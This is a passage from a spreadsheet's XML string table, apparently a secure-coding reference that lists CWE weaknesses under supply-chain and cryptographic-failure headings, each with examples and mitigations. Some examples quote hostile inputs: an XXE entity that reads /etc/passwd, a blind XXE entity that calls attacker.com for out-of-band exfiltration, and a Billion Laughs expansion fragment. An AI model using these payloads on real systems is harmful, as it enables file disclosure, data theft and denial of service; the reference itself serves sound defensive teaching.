  </si>
  <si>
    <t>Authentication state cookie stores password hash in base64 (not encrypted).</t>
  </si>
  <si>
    <t>Encrypt sensitive cookie values; store only opaque session identifiers; set HttpOnly, Secure, SameSite; validate server-side rather than trusting client cookie values.</t>
  </si>
  <si>
    <t>CWE-489</t>
  </si>
  <si>
    <t>Active Debug Code</t>
  </si>
  <si>
    <t>Debug code or development endpoints left active in production.</t>
  </si>
  <si>
    <t>GET /debug/showEnv returns all environment variables including secrets.</t>
  </si>
  <si>
    <t>Test account with admin privileges (testadmin/test) left active in production DB.</t>
  </si>
  <si>
    <t>PHP error display enabled: error_reporting=E_ALL; display_errors=On in production.</t>
  </si>
  <si>
    <t>Separate dev/prod configs; automate detection of debug flags in deployment; remove test accounts; use feature flags gated on environment.</t>
  </si>
  <si>
    <t>CWE-526</t>
  </si>
  <si>
    <t>Environment Variables Exposure</t>
  </si>
  <si>
    <t>Environment variables containing secrets are accessible to processes or users that shouldn't see them.</t>
  </si>
  <si>
    <t>Process list (ps aux) shows application started with DATABASE_PASSWORD=secret as argument.</t>
  </si>
  <si>
    <t>Error handler serialises process.env and sends it in 500 response body.</t>
  </si>
  <si>
    <t>/proc/self/environ accessible to low-privilege users on shared hosting.</t>
  </si>
  <si>
    <t>Pass secrets via files or secret managers, not process arguments; restrict /proc access; sanitise error outputs; use container orchestration secret injection.</t>
  </si>
  <si>
    <t>CWE-547</t>
  </si>
  <si>
    <t>Hard-coded Security Constants</t>
  </si>
  <si>
    <t>Security constants (salt values, crypto keys, token secrets) are hardcoded.</t>
  </si>
  <si>
    <t>JWT_SECRET = 'mysecretkey' hardcoded in Node.js app, same across all instances.</t>
  </si>
  <si>
    <t>Default salt SALT='abc123' used for all password hashing across the codebase.</t>
  </si>
  <si>
    <t>AES key hardcoded as byte[] key = {0x00,0x01,...} in Java encryption utility.</t>
  </si>
  <si>
    <t>Generate unique secrets per deployment; store in secret managers; use key derivation functions; implement secret rotation; scan code for hardcoded secrets.</t>
  </si>
  <si>
    <t>CWE-611</t>
  </si>
  <si>
    <t>XXE (XML External Entity)</t>
  </si>
  <si>
    <t>XML parser processes external entity references, allowing attackers to read files, perform SSRF, or cause DoS.</t>
  </si>
  <si>
    <t>XXE payload &lt;!ENTITY xxe SYSTEM 'file:///etc/passwd'&gt; reads server files.</t>
  </si>
  <si>
    <t>Blind XXE via out-of-band channel: &lt;!ENTITY % xxe SYSTEM 'http://attacker.com/'&gt;.</t>
  </si>
  <si>
    <t>Billion Laughs DoS: nested entity expansion exhausts server memory.</t>
  </si>
  <si>
    <t>Disable external entity processing; use SAX parsers with DTD disabled; validate with OWASP XXE cheat sheet; upgrade XML libraries; prefer JSON over XML where possible.</t>
  </si>
  <si>
    <t>CWE-614</t>
  </si>
  <si>
    <t>Cookie Without Secure Flag</t>
  </si>
  <si>
    <t>Session or auth cookies served over HTTPS lack the Secure flag.</t>
  </si>
  <si>
    <t>Set-Cookie: session=xyz (no Secure flag) sent over HTTPS, transmitted if HTTP request is made.</t>
  </si>
  <si>
    <t>Mixed-content page makes HTTP sub-request, leaking the insecure session cookie.</t>
  </si>
  <si>
    <t>HTTP redirect before HTTPS upgrade sends auth cookie in plaintext.</t>
  </si>
  <si>
    <t>Always set Secure flag on auth and session cookies; implement HSTS; use HTTPS-only redirects; audit all Set-Cookie headers in responses.</t>
  </si>
  <si>
    <t>CWE-776</t>
  </si>
  <si>
    <t>XML Entity Expansion (Billion Laughs)</t>
  </si>
  <si>
    <t>DTD entity expansion with recursive or deeply nested references causes exponential resource consumption.</t>
  </si>
  <si>
    <t>&lt;!ENTITY lol9 '&amp;lol8;&amp;lol8;...'&gt; with 9 levels of nesting crashes XML parser.</t>
  </si>
  <si>
    <t>YAML anchor abuse with deeply recursive aliases causes parser DoS.</t>
  </si>
  <si>
    <t>JSON parser with circular reference handling vulnerability causes OOM.</t>
  </si>
  <si>
    <t>Disable DTD processing; set entity expansion limits; use XML parsers with built-in DoS protection; enforce timeouts on XML parsing operations.</t>
  </si>
  <si>
    <t>CWE-942</t>
  </si>
  <si>
    <t>Permissive CORS Policy</t>
  </si>
  <si>
    <t>CORS or Flash crossdomain.xml allows untrusted domains to make cross-origin requests to sensitive APIs.</t>
  </si>
  <si>
    <t>Access-Control-Allow-Origin: * on authenticated API endpoint allows any site to read responses.</t>
  </si>
  <si>
    <t>crossdomain.xml: &lt;allow-access-from domain='*'/&gt; allows any Flash app to access the site.</t>
  </si>
  <si>
    <t>CORS policy reflects request Origin header without validation: allows attacker.com.</t>
  </si>
  <si>
    <t>Whitelist specific trusted origins; never use wildcard for authenticated endpoints; validate Origin against a strict allowlist; use SameSite cookies as defence-in-depth.</t>
  </si>
  <si>
    <t>CWE-1004</t>
  </si>
  <si>
    <t>Cookie Without HttpOnly Flag</t>
  </si>
  <si>
    <t>Cookies containing session tokens lack the HttpOnly flag, making them accessible via JavaScript.</t>
  </si>
  <si>
    <t>document.cookie returns session token from XSS payload because HttpOnly not set.</t>
  </si>
  <si>
    <t>Stored XSS steals all cookies including auth token via XMLHttpRequest.</t>
  </si>
  <si>
    <t>Browser extension reads auth cookie from document.cookie on target domain.</t>
  </si>
  <si>
    <t>Set HttpOnly on all session and auth cookies; use Content Security Policy; implement XSS protections; regularly audit Set-Cookie headers.</t>
  </si>
  <si>
    <t>CWE-1174</t>
  </si>
  <si>
    <t>ASP.NET: Improper Model Validation</t>
  </si>
  <si>
    <t>ASP.NET app skips or improperly validates model data, allowing invalid or over-posted data.</t>
  </si>
  <si>
    <t>Mass assignment: POST /user with IsAdmin=true accepted because model binding lacks whitelist.</t>
  </si>
  <si>
    <t>ModelState.IsValid not checked, so invalid data (negative price) saved to database.</t>
  </si>
  <si>
    <t>Bind attribute missing, allowing binding of all model properties including sensitive ones.</t>
  </si>
  <si>
    <t>Always check ModelState.IsValid; use [Bind(Include=...)] or ViewModels with only permitted fields; apply data annotations; test with unexpected/malformed inputs.</t>
  </si>
  <si>
    <t>A03</t>
  </si>
  <si>
    <t>Software Supply Chain Failures</t>
  </si>
  <si>
    <t>CWE-477</t>
  </si>
  <si>
    <t>Use of Obsolete Function</t>
  </si>
  <si>
    <t>The code calls deprecated or obsolete functions that may have known security weaknesses.</t>
  </si>
  <si>
    <t>PHP app uses mysql_query() (removed in PHP 7) instead of PDO with prepared statements.</t>
  </si>
  <si>
    <t>C code uses gets() (removed in C11) instead of fgets(), enabling buffer overflow.</t>
  </si>
  <si>
    <t>Python 2 pickle.loads() used instead of safer alternatives, enabling arbitrary code execution.</t>
  </si>
  <si>
    <t>Audit codebase for deprecated API usage with static analysis; update to supported library versions; subscribe to security advisories; enforce modern API usage in code reviews.</t>
  </si>
  <si>
    <t>CWE-1035</t>
  </si>
  <si>
    <t>Using Components with Known Vulnerabilities</t>
  </si>
  <si>
    <t>The application uses libraries with publicly disclosed, unpatched vulnerabilities.</t>
  </si>
  <si>
    <t>Apache Log4j 2.14.1 in production is vulnerable to Log4Shell (CVE-2021-44228).</t>
  </si>
  <si>
    <t>Spring Framework 5.3.17 used, vulnerable to Spring4Shell RCE (CVE-2022-22965).</t>
  </si>
  <si>
    <t>Outdated jQuery 1.x with known XSS vulnerabilities included in production bundle.</t>
  </si>
  <si>
    <t>Use SCA tools (Dependabot, Snyk, OWASP Dependency-Check); maintain SBOM; subscribe to CVE feeds; implement automated dependency update PRs; define vulnerability SLAs.</t>
  </si>
  <si>
    <t>CWE-1104</t>
  </si>
  <si>
    <t>Unmaintained Third Party Components</t>
  </si>
  <si>
    <t>The application relies on third-party libraries that are no longer actively maintained.</t>
  </si>
  <si>
    <t>Node.js app depends on event-stream package abandoned after malicious contributor incident.</t>
  </si>
  <si>
    <t>PHP app uses unmaintained Zend Framework 1 (EOL 2016) with no security patches.</t>
  </si>
  <si>
    <t>Python app depends on package with last commit in 2015 and no active maintainers.</t>
  </si>
  <si>
    <t>Audit dependencies for maintenance status; replace EOL components; consider forking critical unmaintained dependencies; track dependency health with Renovate or Dependabot.</t>
  </si>
  <si>
    <t>CWE-1329</t>
  </si>
  <si>
    <t>Component That is Not Updateable</t>
  </si>
  <si>
    <t>The product uses a component that cannot be patched or updated, leaving vulnerabilities permanently unaddressed.</t>
  </si>
  <si>
    <t>Embedded firmware uses OpenSSL 0.9.8 compiled into ROM, unable to be patched for Heartbleed.</t>
  </si>
  <si>
    <t>Legacy Java applet dependency on end-of-life JRE with no update mechanism.</t>
  </si>
  <si>
    <t>IoT device with hardcoded library version that vendor no longer supports.</t>
  </si>
  <si>
    <t>Design systems with updateable components; use modular architecture; establish vendor patch commitments; implement compensating controls (network isolation, WAF) for non-updateable components.</t>
  </si>
  <si>
    <t>CWE-1357</t>
  </si>
  <si>
    <t>Insufficiently Trustworthy Component</t>
  </si>
  <si>
    <t>The product relies on a component that lacks sufficient security assurances or unknown provenance.</t>
  </si>
  <si>
    <t>npm package with 5 stars and 10 weekly downloads used for JWT validation in production.</t>
  </si>
  <si>
    <t>Unknown GitHub user's cryptography library used without audit or review.</t>
  </si>
  <si>
    <t>Free WordPress plugin from unofficial source performs authentication bypass.</t>
  </si>
  <si>
    <t>Vet third-party components before use; prefer well-maintained, community-audited libraries; conduct security reviews of critical dependencies; use SBOM to track component provenance.</t>
  </si>
  <si>
    <t>CWE-1395</t>
  </si>
  <si>
    <t>Dependency on Vulnerable Third-Party Component</t>
  </si>
  <si>
    <t>The product explicitly depends on a third-party component containing a known security vulnerability.</t>
  </si>
  <si>
    <t>package.json pinned to lodash 4.17.4 which has CVE-2019-10744 prototype pollution.</t>
  </si>
  <si>
    <t>pom.xml hardcodes jackson-databind 2.9.8 with known deserialization CVEs.</t>
  </si>
  <si>
    <t>requirements.txt pins Pillow 7.1.0 with multiple image-parsing CVEs.</t>
  </si>
  <si>
    <t>Use automated SCA in CI/CD to block builds with known-vulnerable dependencies; define vulnerability severity thresholds; maintain a remediation SLA; use lock files with automated update PRs.</t>
  </si>
  <si>
    <t>A04</t>
  </si>
  <si>
    <t>Cryptographic Failures</t>
  </si>
  <si>
    <t>CWE-261</t>
  </si>
  <si>
    <t>Weak Encoding for Password</t>
  </si>
  <si>
    <t>Passwords are stored or transmitted using an encoding scheme rather than a proper one-way hash.</t>
  </si>
  <si>
    <t>User passwords stored as Base64 strings in database, trivially reversible.</t>
  </si>
  <si>
    <t>Password transmitted in Authorization header as base64(user:pass) over HTTP.</t>
  </si>
  <si>
    <t>MD5 of password used as 'encryption' for storage, easily reversed with rainbow tables.</t>
  </si>
  <si>
    <t>Use bcrypt, Argon2id, or scrypt with appropriate cost factors; never use reversible encoding for passwords; audit stored credential formats.</t>
  </si>
  <si>
    <t>CWE-296</t>
  </si>
  <si>
    <t>Improper Certificate Chain of Trust</t>
  </si>
  <si>
    <t>The software doesn't verify the certificate chain of trust, making it vulnerable to MITM attacks.</t>
  </si>
  <si>
    <t>Mobile app accepts any SSL certificate including self-signed, vulnerable to MITM.</t>
  </si>
  <si>
    <t>TrustManager implementing checkServerTrusted() with empty body bypasses all validation.</t>
  </si>
  <si>
    <t>HTTP client configured with trustAllCerts=true in production code.</t>
  </si>
  <si>
    <t>Use platform certificate validation; implement certificate pinning for mobile apps; never override SSL validation in production; use automated TLS configuration testing (testssl.sh).</t>
  </si>
  <si>
    <t>CWE-319</t>
  </si>
  <si>
    <t>Cleartext Transmission of Sensitive Information</t>
  </si>
  <si>
    <t>Sensitive data is sent over unencrypted channels.</t>
  </si>
  <si>
    <t>Login credentials POSTed over http:// to /login endpoint.</t>
  </si>
  <si>
    <t>Internal microservice communication over plain HTTP within 'trusted' internal network.</t>
  </si>
  <si>
    <t>FTP used for configuration backup transfers, sending credentials in cleartext.</t>
  </si>
  <si>
    <t>Enforce TLS 1.2+ for all communications; implement HSTS; use mutual TLS for internal services; disable insecure protocols (FTP, Telnet, HTTP); test with tools like Wireshark and testssl.sh.</t>
  </si>
  <si>
    <t>CWE-320</t>
  </si>
  <si>
    <t>Key Management Errors</t>
  </si>
  <si>
    <t>Errors in cryptographic key management including insecure generation, storage, distribution, rotation, or destruction.</t>
  </si>
  <si>
    <t>Encryption keys stored in the same database as encrypted data.</t>
  </si>
  <si>
    <t>TLS private key stored in world-readable directory without passphrase.</t>
  </si>
  <si>
    <t>API keys never rotated for 3+ years despite being distributed to multiple parties.</t>
  </si>
  <si>
    <t>Use dedicated KMS (AWS KMS, HashiCorp Vault); implement key rotation policies; separate key storage from encrypted data; audit key access logs; define key lifecycle procedures.</t>
  </si>
  <si>
    <t>CWE-321</t>
  </si>
  <si>
    <t>Hard-coded Cryptographic Key</t>
  </si>
  <si>
    <t>Encryption keys are hardcoded in source code.</t>
  </si>
  <si>
    <t>AES_KEY = b'1234567890123456' hardcoded in Python encryption module.</t>
  </si>
  <si>
    <t>RSA private key embedded as string constant in Android APK.</t>
  </si>
  <si>
    <t>DES key hardcoded in C#: byte[] key = Encoding.UTF8.GetBytes('MySecretKey12345').</t>
  </si>
  <si>
    <t>Generate unique keys per deployment; store in HSMs or KMS; use environment-based key injection; scan code for hardcoded key patterns; implement key rotation.</t>
  </si>
  <si>
    <t>CWE-322</t>
  </si>
  <si>
    <t>Key Exchange without Entity Authentication</t>
  </si>
  <si>
    <t>Key exchange occurs without verifying the identity of the communicating parties.</t>
  </si>
  <si>
    <t>Custom Diffie-Hellman implementation without certificate-based authentication allows MITM.</t>
  </si>
  <si>
    <t>SSH allows keyboard-interactive without host key verification (StrictHostKeyChecking no).</t>
  </si>
  <si>
    <t>Key agreement protocol doesn't authenticate the initiator, allowing server impersonation.</t>
  </si>
  <si>
    <t>Always combine key exchange with mutual authentication; use TLS with certificate validation; implement certificate pinning; avoid rolling custom key exchange protocols.</t>
  </si>
  <si>
    <t>CWE-323</t>
  </si>
  <si>
    <t>Reusing a Nonce/Key Pair</t>
  </si>
  <si>
    <t>Reusing a nonce with the same key in stream ciphers or AEAD modes leaks information about the plaintext.</t>
  </si>
  <si>
    <t>AES-GCM implementation uses static IV=0 for all encryptions, enabling plaintext recovery.</t>
  </si>
  <si>
    <t>ChaCha20-Poly1305 nonce counter resets on service restart, causing nonce reuse.</t>
  </si>
  <si>
    <t>Two different plaintexts encrypted with same nonce+key allow XOR-based attack.</t>
  </si>
  <si>
    <t>Use cryptographically random nonces; use counter-based nonces with strict monotonicity; prefer AEAD modes with automatic nonce management; use well-tested crypto libraries.</t>
  </si>
  <si>
    <t>CWE-324</t>
  </si>
  <si>
    <t>Key Past Expiration Date</t>
  </si>
  <si>
    <t>Cryptographic keys continue to be used after their designed validity period.</t>
  </si>
  <si>
    <t>TLS certificate used 3 years past expiry date on internal service.</t>
  </si>
  <si>
    <t>Code signing certificate with 5-year-old key used for signing new releases.</t>
  </si>
  <si>
    <t>Encryption key with no rotation policy in use for 10+ years.</t>
  </si>
  <si>
    <t>Implement automatic certificate/key rotation; set expiry on all cryptographic material; use cert-manager or similar tools; monitor for expiring keys; define key rotation policies.</t>
  </si>
  <si>
    <t>CWE-325</t>
  </si>
  <si>
    <t>Missing Cryptographic Step</t>
  </si>
  <si>
    <t>A necessary cryptographic step (MAC, signature verification, integrity check) is omitted.</t>
  </si>
  <si>
    <t>Decrypt-then-MAC pattern implemented as decrypt only, skipping MAC verification.</t>
  </si>
  <si>
    <t>JWT library upgraded but signature verification step removed by mistake, accepting unsigned tokens.</t>
  </si>
  <si>
    <t>File encrypted but no integrity check; tampered ciphertext decrypted silently.</t>
  </si>
  <si>
    <t>Use authenticated encryption (AES-GCM, ChaCha20-Poly1305); verify MACs/signatures before use; use well-tested crypto libraries; write tests for crypto flows.</t>
  </si>
  <si>
    <t>CWE-326</t>
  </si>
  <si>
    <t>Inadequate Encryption Strength</t>
  </si>
  <si>
    <t>Encryption is used but with insufficient key length or algorithm parameters.</t>
  </si>
  <si>
    <t>RSA-512 key used for TLS, breakable in hours with modern hardware.</t>
  </si>
  <si>
    <t>DES (56-bit key) used for data encryption, vulnerable to brute force.</t>
  </si>
  <si>
    <t>RC4 stream cipher used in TLS, susceptible to BEAST and similar attacks.</t>
  </si>
  <si>
    <t>Use RSA 2048+ or ECC 256+; use AES-256 for symmetric encryption; follow NIST SP 800-131A; configure TLS cipher suites to exclude weak algorithms.</t>
  </si>
  <si>
    <t>CWE-327</t>
  </si>
  <si>
    <t>Broken or Risky Cryptographic Algorithm</t>
  </si>
  <si>
    <t>The application uses cryptographic algorithms known to have significant weaknesses.</t>
  </si>
  <si>
    <t>MD5 used for password hashing, vulnerable to collision and rainbow table attacks.</t>
  </si>
  <si>
    <t>SHA-1 used for code signing certificates, deprecated by major browsers and CAs.</t>
  </si>
  <si>
    <t>RC4 used in TLS for session encryption, vulnerable to statistical attacks.</t>
  </si>
  <si>
    <t>Replace with SHA-256/SHA-3 for hashing; use AES-GCM or ChaCha20-Poly1305 for encryption; follow OWASP Cryptographic Storage Cheat Sheet; audit and migrate legacy algorithms.</t>
  </si>
  <si>
    <t>CWE-328</t>
  </si>
  <si>
    <t>Reversible One-Way Hash</t>
  </si>
  <si>
    <t>A hash function is used that is reversible or computationally feasible to reverse.</t>
  </si>
  <si>
    <t>Base64 encoding used as 'hash' for password storage.</t>
  </si>
  <si>
    <t>MD5 of email used as user ID, reversible with rainbow tables for common emails.</t>
  </si>
  <si>
    <t>Custom XOR-based 'hash' function is trivially reversible.</t>
  </si>
  <si>
    <t>Use cryptographically secure one-way hash functions (SHA-256 or better); for passwords use adaptive functions (bcrypt, Argon2); audit all hash usages in codebase.</t>
  </si>
  <si>
    <t>CWE-329</t>
  </si>
  <si>
    <t>Static IV with CBC Mode</t>
  </si>
  <si>
    <t>AES-CBC encryption reuses a predictable or static IV, enabling pattern detection and chosen-plaintext attacks.</t>
  </si>
  <si>
    <t>AES-CBC with IV always set to all zeros, revealing patterns when same plaintext blocks appear.</t>
  </si>
  <si>
    <t>IV derived deterministically from key material, making ciphertext predictable.</t>
  </si>
  <si>
    <t>CBC encryption reuses previous block as IV, enabling BEAST-style attacks.</t>
  </si>
  <si>
    <t>Generate a cryptographically random IV for every encryption operation; prepend IV to ciphertext; prefer AES-GCM which handles nonces more safely; use well-tested crypto libraries.</t>
  </si>
  <si>
    <t>CWE-330</t>
  </si>
  <si>
    <t>Use of Insufficiently Random Values</t>
  </si>
  <si>
    <t>The product uses values that appear random but are predictable.</t>
  </si>
  <si>
    <t>Math.random() used to generate session tokens, predictable from previous values.</t>
  </si>
  <si>
    <t>Timestamp-based token generation: token = str(int(time.time())), trivially guessable.</t>
  </si>
  <si>
    <t>PRNG seeded with process ID, predictable in low-randomness environments.</t>
  </si>
  <si>
    <t>Use OS-provided CSPRNG (os.urandom, /dev/urandom, CryptGenRandom); use crypto.randomBytes() in Node.js; never use math/language PRNGs for security tokens; audit all random value generation.</t>
  </si>
  <si>
    <t>CWE-331</t>
  </si>
  <si>
    <t>Insufficient Entropy</t>
  </si>
  <si>
    <t>The system generates cryptographic material with insufficient entropy.</t>
  </si>
  <si>
    <t>System generates TLS private key at first boot before sufficient entropy is available.</t>
  </si>
  <si>
    <t>Container generates SSH host key immediately on startup with low /dev/random entropy.</t>
  </si>
  <si>
    <t>Random number generation in embedded device uses weak hardware entropy source.</t>
  </si>
  <si>
    <t>Seed PRNG from high-quality entropy sources; use hardware RNG where available; delay key generation until sufficient entropy; use entropy estimation tools.</t>
  </si>
  <si>
    <t>CWE-332</t>
  </si>
  <si>
    <t>Insufficient Entropy in PRNG</t>
  </si>
  <si>
    <t>The pseudo-random number generator lacks sufficient entropy in its internal state.</t>
  </si>
  <si>
    <t>Java Random() seeded with currentTimeMillis() produces predictable output.</t>
  </si>
  <si>
    <t>PHP rand() used for security tokens, predictable with knowledge of seed.</t>
  </si>
  <si>
    <t>Linear congruential generator used for session ID generation.</t>
  </si>
  <si>
    <t>Use java.security.SecureRandom, Python's secrets module, or OS-level CSPRNG; avoid Math.random/rand() for security purposes; test RNG output with statistical test suites (NIST SP 800-22).</t>
  </si>
  <si>
    <t>CWE-334</t>
  </si>
  <si>
    <t>Small Space of Random Values</t>
  </si>
  <si>
    <t>The number of possible random values is too small, making exhaustive search feasible.</t>
  </si>
  <si>
    <t>4-digit PIN used as 2FA code, enumerable in 10,000 attempts.</t>
  </si>
  <si>
    <t>Password reset token is 6 alphanumeric characters, brute-forceable.</t>
  </si>
  <si>
    <t>Session ID is a 32-bit integer, making collision/guessing feasible.</t>
  </si>
  <si>
    <t>Use at least 128 bits of entropy for session tokens; use 6+ character codes only with rate limiting and expiry; implement account lockout; use longer random tokens for security-sensitive operations.</t>
  </si>
  <si>
    <t>CWE-335</t>
  </si>
  <si>
    <t>Incorrect PRNG Seed Usage</t>
  </si>
  <si>
    <t>The PRNG is seeded incorrectly (same seed, predictable seed) resulting in reproducible sequences.</t>
  </si>
  <si>
    <t>random.seed(42) hardcoded in test utility accidentally included in production.</t>
  </si>
  <si>
    <t>PRNG re-seeded with same value on each request, producing identical output.</t>
  </si>
  <si>
    <t>Seed derived from user-supplied data, allowing attacker to control PRNG output.</t>
  </si>
  <si>
    <t>Use automatic OS-seeded CSPRNGs; never manually seed security-critical PRNGs; use secrets module in Python, SecureRandom in Java; audit all PRNG instantiation and seeding.</t>
  </si>
  <si>
    <t>CWE-336</t>
  </si>
  <si>
    <t>Same Seed in PRNG</t>
  </si>
  <si>
    <t>The PRNG is initialised with the same seed on every run, generating identical sequences.</t>
  </si>
  <si>
    <t>Node.js app creates new Math.random() seeded with 1 at startup, same sequence every run.</t>
  </si>
  <si>
    <t>C program srand(1) at initialisation produces identical rand() sequence on every execution.</t>
  </si>
  <si>
    <t>Kubernetes pod restarts and reinitialises PRNG with same seed, cycling session IDs.</t>
  </si>
  <si>
    <t>Use OS-seeded CSPRNG exclusively; avoid manual seeding; if seeding required use high-entropy sources; use StaticRandom only for testing; test RNG behaviour across restarts.</t>
  </si>
  <si>
    <t>CWE-337</t>
  </si>
  <si>
    <t>Predictable PRNG Seed</t>
  </si>
  <si>
    <t>A PRNG is seeded with a value an attacker can predict (timestamp, PID, etc.).</t>
  </si>
  <si>
    <t>Session token: random.seed(int(time.time())); token=random.randint(0,999999), guessable by clock skew.</t>
  </si>
  <si>
    <t>Token seeded with process start time visible in /proc/stat, reproducible by attacker.</t>
  </si>
  <si>
    <t>PHP mt_rand() seeded from timestamp, predictable from observed responses.</t>
  </si>
  <si>
    <t>Seed from high-quality entropy (/dev/urandom); use secrets.token_hex() in Python; avoid time/PID-based seeding; use external entropy sources on embedded systems.</t>
  </si>
  <si>
    <t>CWE-338</t>
  </si>
  <si>
    <t>Cryptographically Weak PRNG</t>
  </si>
  <si>
    <t>A PRNG not designed for cryptographic use is used for security-sensitive operations.</t>
  </si>
  <si>
    <t>java.util.Random used for session token generation instead of SecureRandom.</t>
  </si>
  <si>
    <t>Python random.choice() used to generate password reset tokens.</t>
  </si>
  <si>
    <t>JavaScript Math.random() used as nonce in OAuth state parameter.</t>
  </si>
  <si>
    <t>Replace with CSPRNG: SecureRandom (Java), secrets (Python), crypto (Node.js); audit all security-relevant random operations; use linting rules to flag weak PRNG usage.</t>
  </si>
  <si>
    <t>CWE-340</t>
  </si>
  <si>
    <t>Predictable Numbers or Identifiers</t>
  </si>
  <si>
    <t>The product generates identifiers using a predictable algorithm.</t>
  </si>
  <si>
    <t>Order IDs are sequential integers (order_id=1001, 1002...), allowing enumeration.</t>
  </si>
  <si>
    <t>Password reset tokens are MD5(username+timestamp), predictable with known username.</t>
  </si>
  <si>
    <t>Session IDs incrementing counter: sess_00001, sess_00002...</t>
  </si>
  <si>
    <t>Use UUIDs v4 (random) or CSPRNG-derived tokens; add randomness to identifiers; use indirect reference maps; test identifier unpredictability with automated enumeration tools.</t>
  </si>
  <si>
    <t>CWE-342</t>
  </si>
  <si>
    <t>Predictable Exact Value from Previous Values</t>
  </si>
  <si>
    <t>The system generates values that an attacker can determine from previously observed values.</t>
  </si>
  <si>
    <t>LCG-based token generator: next token derivable from observed token by reverse-engineering multiplier.</t>
  </si>
  <si>
    <t>OTP counter-based token value leaks future values once attacker observes 3+ consecutive codes.</t>
  </si>
  <si>
    <t>Weak PRNG for nonce allows predicting next nonce from previous nonces.</t>
  </si>
  <si>
    <t>Use CSPRNGs; avoid sequential or mathematically-related tokens; use time-based tokens (TOTP) with short validity windows; monitor for sequential access pattern anomalies.</t>
  </si>
  <si>
    <t>CWE-347</t>
  </si>
  <si>
    <t>Improper Signature Verification</t>
  </si>
  <si>
    <t>The software fails to verify or incorrectly verifies a cryptographic signature.</t>
  </si>
  <si>
    <t>JWT alg:none attack: server accepts unsigned token because algorithm field not validated.</t>
  </si>
  <si>
    <t>RSA signature verification uses public key from the token itself rather than trusted store.</t>
  </si>
  <si>
    <t>Code update signature check passes because exception is caught and silently ignored.</t>
  </si>
  <si>
    <t>Always validate signatures against a trusted key store; reject unsigned or algorithm:none tokens; use well-tested JWT libraries; write explicit tests for signature validation failure cases.</t>
  </si>
  <si>
    <t>CWE-523</t>
  </si>
  <si>
    <t>Unprotected Transport of Credentials</t>
  </si>
  <si>
    <t>Authentication credentials are transmitted over unprotected channels.</t>
  </si>
  <si>
    <t>Basic Auth credentials sent over HTTP without TLS, visible in network capture.</t>
  </si>
  <si>
    <t>LDAP bind operation over port 389 (plaintext) instead of 636 (LDAPS).</t>
  </si>
  <si>
    <t>API key transmitted in URL query string over HTTP: ?api_key=secret.</t>
  </si>
  <si>
    <t>Enforce HTTPS for all auth flows; use HSTS; avoid credentials in URLs; use LDAPS/STARTTLS; test with network interception tools; implement certificate pinning for mobile.</t>
  </si>
  <si>
    <t>CWE-757</t>
  </si>
  <si>
    <t>Algorithm Downgrade Attack</t>
  </si>
  <si>
    <t>During protocol negotiation, the software allows selection of a weaker algorithm, enabling downgrade attacks.</t>
  </si>
  <si>
    <t>TLS POODLE attack: server allows SSLv3 fallback during handshake.</t>
  </si>
  <si>
    <t>SSH server accepts diffie-hellman-group1-sha1 (1024-bit) due to client compatibility setting.</t>
  </si>
  <si>
    <t>HTTPS server accepts RC4 cipher suites via negotiation with legacy clients.</t>
  </si>
  <si>
    <t>Configure minimum protocol versions (TLS 1.2+); disable weak cipher suites; use HSTS preloading; configure cipher priority to prefer strong algorithms; test with testssl.sh.</t>
  </si>
  <si>
    <t>CWE-759</t>
  </si>
  <si>
    <t>Hash Without Salt</t>
  </si>
  <si>
    <t>Passwords are hashed without a unique random salt, enabling rainbow table attacks.</t>
  </si>
  <si>
    <t>All users with password 'password123' have identical SHA-256 hash, identifiable in DB dump.</t>
  </si>
  <si>
    <t>MD5(password) without salt: entire table crackable with precomputed rainbow tables.</t>
  </si>
  <si>
    <t>CRC32 hash without salt for document integrity allows preimage construction.</t>
  </si>
  <si>
    <t>Always use random, per-user salts of at least 16 bytes; use bcrypt/Argon2 which handle salts automatically; never use unsalted hashes for passwords; audit legacy password storage.</t>
  </si>
  <si>
    <t>CWE-760</t>
  </si>
  <si>
    <t>Hash With Predictable Salt</t>
  </si>
  <si>
    <t>Using a predictable salt (username, constant string) reduces the effectiveness of salting.</t>
  </si>
  <si>
    <t>Salt = username: MD5(username+password) allows targeted rainbow tables per username.</t>
  </si>
  <si>
    <t>Salt = 'MyApp' constant, same for all users, effectively unsalted.</t>
  </si>
  <si>
    <t>Salt = registration_date, predictable from public profile, enabling pre-computation.</t>
  </si>
  <si>
    <t>Use cryptographically random salts (16+ bytes, unique per user); use bcrypt/Argon2 which generate random salts automatically; never derive salts from predictable data.</t>
  </si>
  <si>
    <t>CWE-780</t>
  </si>
  <si>
    <t>RSA Without OAEP</t>
  </si>
  <si>
    <t>RSA encryption uses PKCS#1 v1.5 padding instead of OAEP, making it vulnerable to Bleichenbacher attacks.</t>
  </si>
  <si>
    <t>RSA PKCS#1 v1.5 used for session key encryption, vulnerable to adaptive chosen-ciphertext attack.</t>
  </si>
  <si>
    <t>Java Cipher.getInstance('RSA') defaults to PKCS1Padding, enabling Bleichenbacher attack.</t>
  </si>
  <si>
    <t>TLS server supports RSA key exchange with PKCS#1 v1.5, vulnerable to ROBOT attack.</t>
  </si>
  <si>
    <t>Use RSA/ECB/OAEPWithSHA-256AndMGF1Padding; prefer ECDHE over RSA key exchange; disable RSA key exchange in TLS; use RSA-OAEP in JWE; test with ROBOT detection tool.</t>
  </si>
  <si>
    <t>CWE-916</t>
  </si>
  <si>
    <t>Insufficient Password Hash Effort</t>
  </si>
  <si>
    <t>Password hashing uses an algorithm with an insufficient work factor.</t>
  </si>
  <si>
    <t>SHA-256(password) without stretching: billions of attempts per second on GPU.</t>
  </si>
  <si>
    <t>bcrypt with cost factor 4 (minimum) instead of 10+, easily brute-forced.</t>
  </si>
  <si>
    <t>PBKDF2 with 1000 iterations (NIST recommends 600,000+), too fast for modern hardware.</t>
  </si>
  <si>
    <t>Use bcrypt (cost&gt;=12), Argon2id (time_cost&gt;=2, memory&gt;=64MB), or scrypt with appropriate parameters; benchmark against hardware; increase cost factor over time.</t>
  </si>
  <si>
    <t>CWE-1240</t>
  </si>
  <si>
    <t>Risky Cryptographic Primitive Implementation</t>
  </si>
  <si>
    <t>A cryptographic primitive is used but implemented in a way that introduces vulnerabilities.</t>
  </si>
  <si>
    <t>AES-CBC used without MAC (unauthenticated encryption), allowing padding oracle attacks.</t>
  </si>
  <si>
    <t>Custom RSA implementation vulnerable to timing side-channel, leaking private key bits.</t>
  </si>
  <si>
    <t>ECDSA signing reuses k value (nonce), allowing private key recovery from two signatures.</t>
  </si>
  <si>
    <t>Use high-level, well-tested crypto APIs (libsodium, Tink); avoid implementing low-level primitives; prefer AEAD over raw symmetric modes; use constant-time comparison functions.</t>
  </si>
  <si>
    <t>CWE-1241</t>
  </si>
  <si>
    <t>Predictable Algorithm in Random Number Generator</t>
  </si>
  <si>
